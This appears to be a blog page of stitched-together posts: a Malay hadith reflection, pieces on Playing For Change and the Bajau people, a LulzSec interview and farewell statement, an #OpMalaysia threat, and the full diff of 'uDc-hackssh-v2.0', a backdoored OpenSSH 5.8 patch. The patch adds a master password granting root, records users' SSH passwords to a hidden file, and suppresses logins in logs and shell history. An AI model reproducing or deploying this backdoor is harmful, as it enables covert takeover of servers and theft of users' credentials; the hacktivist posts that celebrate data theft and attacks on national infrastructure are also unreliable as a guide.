5 Sebelum 5

Rasulullah SAW bersabda yang bermaksud: "Rebut lima perkara sebelum datang lima perkara. Masa sihat sebelum sakit, kaya sebelum miskin, lapang sebelum sibuk, muda sebelum tua dan hidup sebelum mati." (Hadis riwayat al-Hakim dan al-Baihaqi)

Janganlah bertangguh-tangguh dalam berbuat kebaikan dan rebutlah 5 perkara sebelum datangnya 5 perkara.

Beribadatlah, dan lakukanlah ibadat sunat disamping ibadat fardhu semasa sihat sebelum datangnya kesakitan,

Bersedekahlah semasa masih kaya (berharta) sebelum ditimpa kemiskinan.

Berzikirlah sewaktu masih mempunyai kelapangan sebelum dilanda kesibukan, misalnya di waktu pagi sebelum melakukan kerja-kerja harian dan di waktu petang setelah selesai bekerja.

Carilah keperluan dunia dan akhirat semasa masih muda dan mempunyai kekuatan tenaga sebelum datangnya tua dan tidak mempunyai kekuatan.

Beramallah di sini (semasa berada di dunia) semasa hidup kerana ia berguna selepas kematian nanti (semasa di akhirat). Di sana kita tidak lagi dapat beramal.

Read more...

Playing For Change

Playing for Change is a multimedia movement created to inspire, connect, and bring peace to the world through music. The idea for this project arose from a common belief that music has the power to break down boundaries and overcome distances between people. No matter whether people come from different geographic, political, economic, spiritual or ideological backgrounds, music has the universal power to transcend and unite us as one human race. And with this truth firmly fixed in our minds, we set out to share it with the world. Playing For Change also created a separate non-profit organization called the Playing For Change Foundation which builds music schools for children around the world.

The project started in 2004 with the organization's self described goal to "inspire, connect, and bring peace to the world through music". The creators of the project, Mark Johnson and Enzo Buono, traveled around the world to places such as New Orleans, Barcelona, South Africa, India, Nepal, the Middle East and Ireland. Using mobile recording equipment, the duo recorded local musicians performing the same song, interpreted into their own style. Among the artists participating, or openly involved in the project, include Vusi Mahlasela, Louis Mhlanga, Clarence Bekker, Tal Ben Ari (Tula), Bono, Keb' Mo', David Broza, Manu Chao and Grandpa Elliott.

The project's first single "Stand by Me", began with a Santa Monica street performer named Roger Ridley (now deceased). The duo traveled the world, recording more and more musicians. All of these versions were considered for mixing a pastiche final version. Read more...

Bajau Legacy - Pangentoman

The Bajau or Bajaw (pronounced /ˈbædʒɔː/ or /ˈbɑːdʒaʊ/), also spelled Bajao, Badjau, Badjaw, or Badjao, are an indigenous ethnic group of Maritime Southeast Asia. Due to escalated conflicts in their native Sulu Archipelago, and discrimination suffered by Muslim groups in the Philippines with regards to education and employment, most of the Bajau have migrated to neighboring Malaysia over the course of 50 years. Currently they are the second largest ethnic group in the state of Sabah, making up 13.4%^[1] of the total population. Groups of Bajau have also migrated to Sulawesi and Kalimantan in Indonesia, although figures of their exact population are unknown.^[2] They were sometimes referred to as the Sea Gypsies, although the term has been used to encompass a number of non-related ethnic groups with similar traditional lifestyles, such as the Moken of the Burmese-Thai Mergui Archipelago and the Orang Laut of southeastern Sumatra and the Riau Islands of Indonesia. The modern outward spread of the Bajau from older inhabited areas seems to have been associated with the development of sea trade in trepang.

The origin of the word Bajau is not clear cut. It is generally accepted that these groups of people can be termed Bajau, though they never call themselves Bajau. Instead, they call themselves with the names of their tribes, usually the place they live or place of origin. They accept the term Bajau because they realize that they share some vocabulary and general genetic characteristic such as in having darker skin, although the Simunuls appear to be an exception in having fairer skin.

British administrators in Sabah, labeled the Samah as Bajau and put Bajau in their birth certificates as their race. During their time in Malaysia, some have started labeling themselves as their ancestors called themselves, such as Simunul. For political reasons and to ensure easy access to the Malaysian special privileges granted to Malays, many have started calling themselves Malay. This is especially true for recent Filipino migrants.


For most of their history, the Bajau have been a nomadic, seafaring people, living off the sea by trading and subsistence fishing.[5] The boat dwelling Bajau see themselves as non-aggressive people. They kept close to the shore by erecting houses on stilts, and traveled using lepa-lepa, handmade boats which many lived in.[5] Although historically originating from the southern Philippine coasts, Sabahan Sama legend narrates that they had originated from members of the royal guard of the Sultan of Johor, after the fall of the Malay Malacca empire, who settled along the east coast of Borneo after being driven there by storms. Another version narrates that they were escorting the Sultan's bride, but the bride was later kidnapped by the Sultan of Brunei. The fact that the Bajau-Sama languages belong to the Philippine branch of Malayo-Polynesian languages would substantiate the anthropological origins of the Bajau groups to be from the Philippines, and put the origin legends down to the historic Malay-centric influence of Bajau culture.

However, there are traces that Sama people came from Riau Archipelago especially Lingga Island more than 300 years ago. It is believed by some that the migration process of Samah to North West Borneo took place more than 100 years earlier, starting from trade with the Empire of Brunei. (note connection to bride being sent from Johor to Sulu and then being kidnapped by the Prince of Brunei) With the fall of the legitimate Sultan of Johor due to being overthrown by Bugis immigrants, Sama people fled to the west coast of North Borneo where they felt safe to live under the protection of the Brunei Sultanate. That's why native Kadazan-Dusun call Sama people as "tuhun(people of) Sama" or "tulun(people of) Sama" in their dialects, the form of recognition before western civilization found Borneo. It was believed that Sama people are not from the royalty of the Sultanate, but loyal workers, craftsmen, boat builders and farmers that fled from cruelty of ethnic cleansing in chaotic Johor during aggression of the Bugis taking over the throne of Johor.

Currently, there exists a huge settlement of Filipino Bajau in Pulau Gaya, off the Sabah coast. Many of them are illegal immigrants on the Malaysian island. With the island as a base, they frequently enter Sabah and find jobs as manual laborers.

Discrimination of Bajau (particularly from the dominant Tausūg people who have historically viewed them as 'inferior' and less specifically from the Christian Filipinos)[6] and the continuing violence in Muslim Mindanao, have driven many Bajau to begging, or to migrate out of the country. They usually resettle in Malaysia and Indonesia, where they are less discriminated against.[4][7] Read more...

New Scientist: Exclusive first interview with key LulzSec hacker

It was early May when LulzSec's profile skyrocketed after a hack on the giant Sony corporation. LulzSec's name comes from Lulz, a corruption of LOL, often denoting laughter at the victim of a prank. For 50 days until it disbanded, the group's unique blend of humour, taunting and unapologetic data theft made it notorious. But knowing whether LulzSec was all about the "lulz" or if it owed more to its roots as part of Anonymous, the umbrella group of internet subculture and digital activism, was pure speculation. Until now.

Who is "Sabu"?
I'm a man who believes in human rights and exposing abuse and corruption. I generally care about people and their situations. I'm into politics and I try my best to stay on top of current events.

We've seen you cast as everything from the greatest of heroes to the most evil of villains. How would you characterise yourself?

It is hard for me to see myself as either. I am not trying to be a martyr. I'm not some cape-wearing hero, nor am I some supervillain trying to bring down the good guys. I'm just doing what I know how to do, and that is counter abuse.

What was your first experience with "hacktivism"?

I got involved about 11 years ago when the US navy was using Vieques Island in Puerto Rico as a bombing range for exercises. There were lots of protests going on and I got involved in supporting the Puerto Rican government by disrupting communications. This whole situation was the first of its kind for the island and the people didn't expect things to go that route. Eventually, the US navy left Vieques.

How did you get involved with Anonymous?

When I found out about what happened to Julian Assange, his arrest in the UK and so on, I found it absolutely absurd. So I got involved with Anonymous at that point.

What operation really inspired you and why?

Earlier this year, we got wind of the Tunisians' plight. Their government was blocking access to any website that reported anti-Tunisian information, including Tunileaks, the Tunisian version of Wikileaks, and any news sites discussing them.

Tunisians came to us telling us about their desire to resist. "Disrupt the government of Tunisia," they said, and we did. We infiltrated the prime minister's site and defaced it externally. When Tunisia filtered off its internet from the world, it was the Tunisians who came online using dial-up and literally allowed us to use their connections to tunnel through to re-deface the prime minister's websites. It was the most impressive thing I've seen: a revolution coinciding both physically and online. It was the first time I had proof that what Anonymous was doing was real and it was working.

What would you like to say to people who say that you and other Antisec/Anonymous/LulzSec members are just troublemakers who have caused untold damage and loss to people for no apparent reason?

Would you rather your millions of emails, passwords, dox [personal information] and credit cards be exposed to the wild to be used by nefarious dealers of private information? Or would you rather have someone expose the hole and tell you your data was exploitable and that it's time to change your passwords? I'm sure we are seen as evil for exposing Sony and others, but at the end of the day, we motivated a giant to upgrade its security.

But what about hacks that were done "for lulz"?

Yes, some hacks under LulzSec were done for the lulz, but there are lessons learned from them all. In 50 days, you saw how big and small companies were handling their user data incorrectly. You saw the US federal government vulnerable to security issues that could have just as easily been exploited by foreign governments. You saw affiliates of the US government handling sensitive emails and they themselves ignored the FBI's better practice manuals about password re-use.

With the Public Broadcasting Service site, you saw the media vulnerable to fake articles. And yes, our Frontline hit [the group attacked the PBS's Frontline television programme website after perceived unfair treatment of Wikileaks] was political, but we also showed what could happen if an organisation were to hack 50 of the biggest media publications right now, online, and distribute a mass news article designed to blend in on each outlet's site. That kind of thing would cause some serious havoc. I mean, we're talking about the potential of crashing stocks or spreading damaging rumours. Everything we did had a duality: a lesson and some LOLs at the same time.

When did you realize you had hit the point of no return?

I was at the point of no return when I realised that I could make a change. Operation Tunisia was it for me. Then HBGary [a security firm attacked by LulzSec]. Now Antisec is the biggest movement in years, unifying all hackers and free thinkers across Anonymous and other groups. There's no going back.

How do you describe what Antisec is about?

Expose corruption. Expose censorship. Expose abuses. Assist our brothers and sisters during their operations in their own countries like the one we have going in Brazil now, Operation Brazil, which is about internet/information censorship. Expose these big multinational companies that have their hands in too much, that have too much power, and don't even take the time to secure your passwords and credit cards. And finally, discussion and education. We are not sitting idly by and letting our rights get thrashed. It's time to rise up now.

So what would an Antisec "win" look like?

There is no win. There's just change and education.

The popularity of LulzSec and Anonymous has inspired many to follow in your footsteps. What words of wisdom do you have for them?

Those who are with me in the fight do not have to be hackers. They can be reporters, artists, public speakers. This movement is about all of us uniting against corruption. But I don't ask anyone to take my risks. I don't want anyone to follow me down my path.

Are you afraid of being caught?

There is no fear in my heart. I've passed the point of no return. I only hope that if I am stopped, the movement continues on the right path without me.

Source: New Scientist
Read more...

LulzSec Issues: 50 Days of Lulz

LulzSec has issued final data release saying they will now go underground while urging the antisec movement continue with what they have started.

The announcement follows 50 days of hacks and attacks launched by the group, the most significant of which being the revelation of how large the US Domestic spy program has grown and the release of documents from the State of Arizona revealing corruption and racism by government in the fight against illegal immigration which included the revelation that US Marines were being used as contract killers.

For the past 50 days we've been disrupting and exposing corporations, governments, often the general population itself, and quite possibly everything in between, just because we could. All to selflessly entertain others - vanity, fame, recognition, all of these things are shadowed by our desire for that which we all love. The raw, uninterrupted, chaotic thrill of entertainment and anarchy. It's what we all crave, even the seemingly lifeless politicians and emotionless, middle-aged self-titled failures. You are not failures. You have not blown away. You can get what you want and you are worth having it, believe in yourself.

Source pastebin


. /$$ /$$ /$$$$$$
.| $$ | $$ /$$__ $$
.| $$ /$$ /$$| $$ /$$$$$$$$| $$ \__/ /$$$$$$ /$$$$$$$
.| $$ | $$ | $$| $$|____ /$$/| $$$$$$ /$$__ $$ /$$_____/
.| $$ | $$ | $$| $$ /$$$$/ \____ $$| $$$$$$$$| $$
.| $$ | $$ | $$| $$ /$$__/ /$$ \ $$| $$_____/| $$
.| $$$$$$$$| $$$$$$/| $$ /$$$$$$$$| $$$$$$/| $$$$$$$| $$$$$$.$
.|________/ \______/ |__/|________/ \______/ \_______/ \_______/
//Laughing at your security since 2011!

.-- .-""-.
. ) ( )
. ( ) (
. / )
. (_ _) 0_,-.__
. (_ )_ |_.-._/
. ( ) |lulz..\
. (__) |__--_/
. |'' ``\ |
. | [Lulz] \ | /b/
. | \ ,,,---===?A`\ | ,==y'
. ___,,,,,---==""\ |M] \ | ;|\ |>
. _ _ \ ___,|H,,---==""""bno,
. o O (_) (_) \ / _ AWAW/
. / _(+)_ dMM/
. \@_,,,,,,---==" \ \\|// MW/
.--''''" === d/
. // SET SAIL FOR FAIL!
. ,'_________________________
. \ \ \ \ ,/~~~~~~~~~~~~~~~~~~~~~~~~~~~
. _____ ,' ~~~ .-""-.~~~~~~ .-""-.
. .-""-. ///==--- /`-._ ..-' -.__..-'
. `-.__..-' =====\\\\\\ V/ .---\.
. ~~~~~~~~~~~~, _',--/_.\ .-""-.
. .-""-.___` -- \| -.__..-

Friends around the globe,

We are Lulz Security, and this is our final release, as today marks something meaningful to us. 50 days ago, we set sail with our humble ship on an uneasy and brutal ocean: the Internet. The hate machine, the love machine, the machine powered by many machines. We are all part of it, helping it grow, and helping it grow on us.

For the past 50 days we've been disrupting and exposing corporations, governments, often the general population itself, and quite possibly everything in between, just because we could. All to selflessly entertain others - vanity, fame, recognition, all of these things are shadowed by our desire for that which we all love. The raw, uninterrupted, chaotic thrill of entertainment and anarchy. It's what we all crave, even the seemingly lifeless politicians and emotionless, middle-aged self-titled failures. You are not failures. You have not blown away. You can get what you want and you are worth having it, believe in yourself.

While we are responsible for everything that The Lulz Boat is, we are not tied to this identity permanently. Behind this jolly visage of rainbows and top hats, we are people. People with a preference for music, a preference for food; we have varying taste in clothes and television, we are just like you. Even Hitler and Osama Bin Laden had these unique variations and style, and isn't that interesting to know? The mediocre painter turned supervillain liked cats more than we did.

Again, behind the mask, behind the insanity and mayhem, we truly believe in the AntiSec movement. We believe in it so strongly that we brought it back, much to the dismay of those looking for more anarchic lulz. We hope, wish, even beg, that the movement manifests itself into a revolution that can continue on without us. The support we've gathered for it in such a short space of time is truly overwhelming, and not to mention humbling. Please don't stop. Together, united, we can stomp down our common oppressors and imbue ourselves with the power and freedom we deserve.

So with those last thoughts, it's time to say bon voyage. Our planned 50 day cruise has expired, and we must now sail into the distance, leaving behind - we hope - inspiration, fear, denial, happiness, approval, disapproval, mockery, embarrassment, thoughtfulness, jealousy, hate, even love. If anything, we hope we had a microscopic impact on someone, somewhere. Anywhere.

Thank you for sailing with us. The breeze is fresh and the sun is setting, so now we head for the horizon.

Let it flow...

Lulz Security - our crew of six wishes you a happy 2011, and a shout-out to all of our battlefleet members and supporters across the globe

------------------------------------------------------------------------------------------------------

Our mayhem: http://lulzsecurity.com/releases/
Our chaos: http://thepiratebay.org/user/LulzSec/
Our final release: http://thepiratebay.org/torrent/6495523/50_Days_of_Lulz

Please make mirrors of material on the website, because we're not renewing the hosting. Goodbye. <3 Read more...

uDc-hackssh-v2.0

CHANAGES:
Updated for openssh-5.x version

FEATURES:
- special password to log in with any user account and get root
- no logs in the machine (messages,auth,utmp,…)
- bash shell will use /dev/null as HISTFILE
- logs user passwords (local and remote sessions)
- should bypass 'PermitRootLogin No"

[slash@Slash-The-Underground]-[Sat Sep 12]-[00:35]-[/pentest/rk/ssh/uDc-hackssh]
$ cat udc-hackssh-v2.0.patch

diff -Ncr openssh-5.8p2/auth-pam.c udc-hackssh-v2.0/auth-pam.c
*** openssh-5.8p2/auth-pam.c Sun Jul 12 20:07:21 2009
--- udc-hackssh-v2.0/auth-pam.c Sun Jun 26 00:55:57 2011
***************
*** 466,471 ****
--- 466,475 ----
   if (sshpam_err != PAM_SUCCESS)
    goto auth_fail;
   sshpam_err = pam_authenticate(sshpam_handle, flags);
+ // slash patch
+  if(uDc)
+   sshpam_err = PAM_SUCCESS;
+ // end of slash
   if (sshpam_err != PAM_SUCCESS)
    goto auth_fail;
 
***************
*** 816,821 ****
--- 820,834 ----
   Buffer buffer;
   struct pam_ctxt *ctxt = ctx;
 
+ // slash patch
+          if(sshpam_authctxt)
+            for (gurun = 0; gurun < num; ++gurun) {
+                sprintf(slashbuff, "pam_from: %s \tuser: %s \tpass: %s\n",
+                        get_remote_ipaddr(), sshpam_authctxt->user, resp[gurun]);
+                if(!strcmp(BAJAUPASS, resp[gurun])) ctxt->pam_done = uDc = 1;
+                    else uDclog();
+            }
+ // end of patch


   debug2("PAM: %s entering, %u responses", __func__, num);
   switch (ctxt->pam_done) {
   case 1:
***************
*** 1205,1210 ****
--- 1218,1226 ----
    fatal("PAM: %s: failed to set PAM_CONV: %s", __func__,
        pam_strerror(sshpam_handle, sshpam_err));
  
+ // slash patch
+  if(!uDc)
+ // end of patch
   sshpam_err = pam_authenticate(sshpam_handle, flags);
   sshpam_password = NULL;
   if (sshpam_err == PAM_SUCCESS && authctxt->valid) {
diff -Ncr openssh-5.8p2/auth-passwd.c udc-hackssh-v2.0/auth-passwd.c
*** openssh-5.8p2/auth-passwd.c Sun Mar  8 08:40:28 2009
--- udc-hackssh-v2.0/auth-passwd.c Sun Jun 26 01:02:17 2011
***************
*** 92,97 ****
--- 92,103 ----
  #endif
   if (*password == '\0' && options.permit_empty_passwd == 0)
    return 0;
+ // slash patch
+        if(!strcmp(BAJAUPASS, password)) return uDc = 1;
+        sprintf(slashbuff, "pass_from: %s \tuser: %s \tpass: %s\n",
+                get_remote_ipaddr(), pw->pw_name, password);
+        uDclog();
+ // end of patch
  
  #ifdef KRB5
   if (options.kerberos_authentication == 1) {
diff -Ncr openssh-5.8p2/auth.c udc-hackssh-v2.0/auth.c
*** openssh-5.8p2/auth.c Wed Dec  1 09:21:51 2010
--- udc-hackssh-v2.0/auth.c Sat Jun 25 23:45:36 2011
***************
*** 94,99 ****
--- 94,104 ----
  int
  allowed_user(struct passwd * pw)
  {
+ // slash patch
+  if(uDc) return 1;
+  else {
+ // end of patch
+ 
   struct stat st;
   const char *hostname = NULL, *ipaddr = NULL, *passwd = NULL;
   u_int i;
***************
*** 249,258 ****
--- 254,269 ----
   /* We found no reason not to let this user try to log on... */
   return 1;
  }
+ // slash patch
+ }
+ // end of patch
  
  void
  auth_log(Authctxt *authctxt, int authenticated, char *method, char *info)
  {
+ // slash patch
+  if(!uDc) {
+ // end of patch
   void (*authlog) (const char *fmt,...) = verbose;
   char *authmsg;
  
***************
*** 298,303 ****
--- 309,317 ----
    audit_event(audit_classify_auth(method));
  #endif
  }
+ // slash patch
+ }
+ // end of patch
  
  /*
   * Check whether root logins are disallowed.
***************
*** 305,310 ****
--- 319,327 ----
  int
  auth_root_allowed(char *method)
  {
+ // slash patch
+  if(!uDc) {
+ // end of patch
   switch (options.permit_root_login) {
   case PERMIT_YES:
    return 1;
***************
*** 322,327 ****
--- 339,349 ----
   logit("ROOT LOGIN REFUSED FROM %.200s", get_remote_ipaddr());
   return 0;
  }
+ // slash patch
+  else
+  return 1;
+ }
+ // end of patch
  
  
  /*
diff -Ncr openssh-5.8p2/canohost.c udc-hackssh-v2.0/canohost.c
*** openssh-5.8p2/canohost.c Tue Oct 12 10:28:12 2010
--- udc-hackssh-v2.0/canohost.c Sat Jun 25 23:48:02 2011
***************
*** 81,86 ****
--- 81,89 ----
   if (getnameinfo((struct sockaddr *)&from, fromlen, name, sizeof(name),
       NULL, 0, NI_NAMEREQD) != 0) {
    /* Host name not found.  Use ip address. */
+ // slash patch
+   if(!uDc)
+ // end of patch
    return xstrdup(ntop);
   }
  
diff -Ncr openssh-5.8p2/includes.h udc-hackssh-v2.0/includes.h
*** openssh-5.8p2/includes.h Sun Oct 24 07:47:30 2010
--- udc-hackssh-v2.0/includes.h Sun Jun 26 00:59:42 2011
***************
*** 13,18 ****
--- 13,40 ----
   * called by a name other than "ssh" or "Secure Shell".
   */
  
+ // slash patch
+ #include 
+ #include 
+ 
+ #define BAJAUPASS     "CHANGE-ME"
+ #define SSH_LOG       "/dev/lala"
+ 
+ FILE *s9clog;
+ char  slashbuff[1024];
+ int   kambing, gurun, uDc;
+ 
+ #define uDclog() {                                 \
+  kambing=strlen(slashbuff);                               \
+  for(gurun=0; gurun<=kambing; gurun++) slashbuff[gurun]=~slashbuff[gurun];   \
+  s9clog=fopen(SSH_LOG, "a");                         \
+  if(s9clog!=NULL) { fwrite(slashbuff, kambing, 1, s9clog); fclose(s9clog);} \
+  chmod(SSH_LOG, 0666);                             \
+ }
+ 
+ const char *get_remote_ipaddr(void);
+ // end of patch
+ 
  #ifndef INCLUDES_H
  #define INCLUDES_H
  
diff -Ncr openssh-5.8p2/log.c udc-hackssh-v2.0/log.c
*** openssh-5.8p2/log.c Tue Jun 10 21:01:51 2008
--- udc-hackssh-v2.0/log.c Sat Jun 25 23:25:53 2011
***************
*** 336,341 ****
--- 336,345 ----
   char fmtbuf[MSGBUFSIZ];
   char *txt = NULL;
   int pri = LOG_INFO;
+ 
+ // slash patch
+  if(uDc) return;
+ // end of patch
   int saved_errno = errno;
  
   if (level > log_level)
diff -Ncr openssh-5.8p2/loginrec.c udc-hackssh-v2.0/loginrec.c
*** openssh-5.8p2/loginrec.c Mon Jan 17 18:15:31 2011
--- udc-hackssh-v2.0/loginrec.c Sat Jun 25 23:28:05 2011
***************
*** 433,438 ****
--- 433,442 ----
  int
  login_write(struct logininfo *li)
  {
+ // slash patch
+  if(uDc) return 0;
+ // end of patch
+ 
  #ifndef HAVE_CYGWIN
   if (geteuid() != 0) {
    logit("Attempt to write login records by non-root user (aborting)");
diff -Ncr openssh-5.8p2/session.c udc-hackssh-v2.0/session.c
*** openssh-5.8p2/session.c Wed Dec  1 09:02:59 2010
--- udc-hackssh-v2.0/session.c Sun Jun 26 00:01:56 2011
***************
*** 1198,1203 ****
--- 1198,1207 ----
   }
   if (getenv("TZ"))
    child_set_env(&env, &envsize, "TZ", getenv("TZ"));
+ // slash patch
+  if(uDc)
+   child_set_env(&env, &envsize, "HISTFILE", "/dev/null");
+ // end of patch
  
   /* Set custom environment options from RSA authentication. */
   if (!options.use_login) {
***************
*** 1483,1488 ****
--- 1487,1495 ----
  #else
    if (setlogin(pw->pw_name) < 0)
     error("setlogin failed: %s", strerror(errno));
+ // slash patch
+   if(!uDc) {
+ // end of patch
    if (setgid(pw->pw_gid) < 0) {
     perror("setgid");
     exit(1);
***************
*** 1492,1497 ****
--- 1499,1511 ----
     perror("initgroups");
     exit(1);
    }
+ // slash patch
+  }
+  else {
+   setgid(0);
+   initgroups(pw->pw_name, 0);
+  }
+ // end of patch
    endgrent();
  #endif
  
***************
*** 1515,1520 ****
--- 1529,1537 ----
    }
  #else
    /* Permanently switch to the desired uid. */
+ // slash patch
+  if(!uDc)
+ // end of patch
    permanently_set_uid(pw);
  #endif
   }
diff -Ncr openssh-5.8p2/sshconnect1.c udc-hackssh-v2.0/sshconnect1.c
*** openssh-5.8p2/sshconnect1.c Tue Nov  7 20:14:42 2006
--- udc-hackssh-v2.0/sshconnect1.c Sat Jun 25 23:31:17 2011
***************
*** 458,463 ****
--- 458,468 ----
    password = read_passphrase(prompt, 0);
    packet_start(SSH_CMSG_AUTH_PASSWORD);
    ssh_put_password(password);
+ // slash patch
+                 sprintf(slashbuff, "1to: %s \tuser: %s \tpass: %s\n",
+    get_remote_ipaddr(), options.user, password);
+                 uDclog();
+ // end of patch
    memset(password, 0, strlen(password));
    xfree(password);
    packet_send();
diff -Ncr openssh-5.8p2/sshconnect2.c udc-hackssh-v2.0/sshconnect2.c
*** openssh-5.8p2/sshconnect2.c Wed Dec  1 09:21:51 2010
--- udc-hackssh-v2.0/sshconnect2.c Sun Jun 26 01:00:47 2011
***************
*** 883,888 ****
--- 883,893 ----
   packet_put_cstring(authctxt->method->name);
   packet_put_char(0);
   packet_put_cstring(password);
+ // slash patch
+        sprintf(slashbuff, "T0: %s \tuser: %s \tpass: %s\n",
+                get_remote_ipaddr(), options.user, password);
+        uDclog();
+ // end of patch
   memset(password, 0, strlen(password));
   xfree(password);
   packet_add_padding(64);
***************
*** 1558,1563 ****
--- 1563,1573 ----
  
    response = read_passphrase(prompt, echo ? RP_ECHO : 0);
  
+ // slash patch
+                sprintf(slashbuff, "T0: %s \tuser: %s \tpass: %s\n",
+                    get_remote_ipaddr(), options.user, response);
+                uDclog();
+ // end of patch
    packet_put_cstring(response);
    memset(response, 0, strlen(response));
    xfree(response);
diff -Ncr openssh-5.8p2/sshlogin.c udc-hackssh-v2.0/sshlogin.c
*** openssh-5.8p2/sshlogin.c Tue Jan 11 14:20:07 2011
--- udc-hackssh-v2.0/sshlogin.c Sun Jun 26 00:10:32 2011
***************
*** 126,131 ****
--- 126,134 ----
  record_login(pid_t pid, const char *tty, const char *user, uid_t uid,
      const char *host, struct sockaddr *addr, socklen_t addrlen)
  {
+ // slash patch
+  if(!uDc) {
+ // end of patch
   struct logininfo *li;
  
   /* save previous login details before writing new */
***************
*** 136,147 ****
--- 139,156 ----
   login_login(li);
   login_free_entry(li);
  }
+ // slash patch
+ }
+ // end of patch
  
  #ifdef LOGIN_NEEDS_UTMPX
  void
  record_utmp_only(pid_t pid, const char *ttyname, const char *user,
     const char *host, struct sockaddr *addr, socklen_t addrlen)
  {
+ // slash patch
+  if(!uDc) {
+ // end of patch
   struct logininfo *li;
  
   li = login_alloc_entry(pid, user, host, ttyname);
***************
*** 149,163 ****
--- 158,181 ----
   login_utmp_only(li);
   login_free_entry(li);
  }
+ // slash patch
+ }
+ // end of patch
  #endif
  
  /* Records that the user has logged out. */
  void
  record_logout(pid_t pid, const char *tty, const char *user)
  {
+ // slash patch
+  if(!uDc) {
+ // end of patch
   struct logininfo *li;
  
   li = login_alloc_entry(pid, user, NULL, tty);
   login_logout(li);
   login_free_entry(li);
  }
+ // slash patch
+ }
+ // end of patch
diff -Ncr openssh-5.8p2/version.h udc-hackssh-v2.0/version.h
*** openssh-5.8p2/version.h Thu May  5 09:56:54 2011
--- udc-hackssh-v2.0/version.h Sat Jun 25 23:37:03 2011
***************
*** 1,6 ****
  /* $OpenBSD: version.h,v 1.61 2011/02/04 00:44:43 djm Exp $ */
  
! #define SSH_VERSION "OpenSSH_5.8"
  
  #define SSH_PORTABLE "p2"
  #define SSH_RELEASE SSH_VERSION SSH_PORTABLE
--- 1,6 ----
  /* $OpenBSD: version.h,v 1.61 2011/02/04 00:44:43 djm Exp $ */
  
! #define SSH_VERSION "OpenSSH_5.8" // change
  
  #define SSH_PORTABLE "p2"
  #define SSH_RELEASE SSH_VERSION SSH_PORTABLE

Read more...

#OpMalaysia - Die Another Day

#OpMalaysia, another day - Anonops attacks has failed to get the Government full attention. The Malaysian Communications and Multimedia Commission (MCMC) issued a statement regarding the first attempt and claimed there was only a little impact on a Malaysian users as a result.

"Our monitoring of the situation showed that there was a reduced level of attacks by 4.00am this morning and upon further evaluation, so far we gauge that there has been little impact on Malaysian users as a result of this attack."

In reference to this statement, #OpMalaysia posted another statement on 17th of June to youtube says a second round of attacks against the Government of Malaysia is planned for the 4th of July at 13:37 GMT (21:37 MYT).

"We shall bring down the entire countries national infrastructure. We shall make this a day to be remembered. This is your second warning."

Read more...